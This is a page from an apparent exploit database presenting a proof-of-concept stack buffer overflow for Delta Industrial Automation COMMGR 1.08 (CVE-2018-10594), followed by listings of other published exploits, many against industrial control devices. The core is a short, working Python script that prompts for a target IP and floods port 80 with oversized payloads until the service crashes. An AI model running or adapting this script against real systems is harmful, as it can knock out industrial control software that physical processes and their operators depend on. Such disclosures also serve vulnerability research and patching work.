Menu

Search for hundreds of thousands of exploits

"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)"

Author

Exploit author

t4rkd3vilz

Platform

Exploit platform

hardware

Release date

Exploit published date

2018-07-02

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR
- Remote STACK-BASED BUFFER OVERFLOW
# Date: 02.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.deltaww.com/
# Software Link: http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US
# Version:
COMMGR Version 1.08 and prior.
   DVPSimulator EH2, EH3, ES2, SE, SS2
   AHSIM_5x0, AHSIM_5x1
# Tested on: Kali Linux
# CVE : CVE-2018-10594


#Run exploit, result DOS

import socket


ip = raw_input("[+] IP to attack: ")

sarr = []
i = 0
while True:
    try:
        sarr.append(socket.create_connection((ip,80)))
        print "[+] Connection %d" % i
        crash1 = "\x41"*4412 +"\X42"*1000
        sarr[i].send(crash1+'\r\n')
        i+=1
    except socket.error:
        print "[*] Server crashed "
        raw_input()
        break
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-30 "Intelbras Router RF 301K 1.1.2 - Authentication Bypass" webapps hardware "Kaio Amaral"
2020-11-30 "ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure" webapps hardware "Zagros Bingol"
2020-11-27 "Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution" webapps hardware "Emre SUREN"
2020-11-24 "Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)" webapps hardware maj0rmil4d
2020-11-23 "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass" webapps hardware malwrforensics
2020-11-19 "Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification" webapps hardware "Ricardo Longatto"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-16 "Cisco 7937G - DoS/Privilege Escalation" remote hardware "Cody Martin"
2020-11-13 "ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)" webapps hardware b1ack0wl
2020-11-13 "Citrix ADC NetScaler - Local File Inclusion (Metasploit)" webapps hardware "RAMELLA Sebastien"
Release Date Title Type Platform Author
2018-07-13 "Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery" webapps hardware t4rkd3vilz
2018-07-09 "Tor Browser < 0.3.2.10 - Use After Free (PoC)" dos linux t4rkd3vilz
2018-07-02 "Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)" dos hardware t4rkd3vilz
2018-05-30 "Siemens SIMATIC S7-300 CPU - Remote Denial of Service" dos linux t4rkd3vilz
2018-05-24 "Honeywell XL Web Controller - Cross-Site Scripting" webapps linux t4rkd3vilz
2018-05-23 "Honeywell Scada System - Information Disclosure" webapps linux t4rkd3vilz
2018-05-23 "Siemens SCALANCE S613 - Remote Denial of Service" dos linux t4rkd3vilz
2018-05-22 "Siemens SIMATIC S7-1500 CPU - Remote Denial of Service" dos linux t4rkd3vilz
2018-05-22 "Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting" webapps linux t4rkd3vilz
2018-05-22 "Nordex N149/4.0-4.5 - SQL Injection" webapps hardware t4rkd3vilz
2018-05-21 "Schneider Electric PLCs - Cross-Site Request Forgery" webapps windows t4rkd3vilz
2018-05-21 "Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery" webapps linux t4rkd3vilz
2018-05-17 "Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery" webapps linux t4rkd3vilz
2018-05-16 "Rockwell Scada System 27.011 - Cross-Site Scripting" webapps windows t4rkd3vilz
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.